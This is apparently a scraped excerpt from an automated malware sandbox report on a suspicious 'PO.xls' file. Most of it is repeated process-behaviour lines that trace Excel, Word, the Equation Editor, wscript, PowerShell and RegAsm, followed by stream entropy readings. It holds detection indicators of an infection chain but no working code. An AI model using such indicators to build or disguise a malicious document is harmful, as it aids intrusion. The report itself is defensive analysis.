                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: PO.xlsStream path 'MBD003D5860/Package' entropy: 7.98519854743 (max. 8.0)
                    Source: PO.xlsStream path 'Workbook' entropy: 7.99896277753 (max. 8.0)
                    Source: ~DFCE2419FB28151868.TMP.0.drStream path 'Package' entropy: 7.97426842891 (max. 8.0)
                    Source: 62830000.0.drStream path 'MBD003D5860/Package' entropy: 7.97426842891 (max. 8.0)
                    Source: 62830000.0.drStream path 'Workbook' entropy: 7.99901081925 (max. 8.0)
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                    Malware Analysis System Evasion

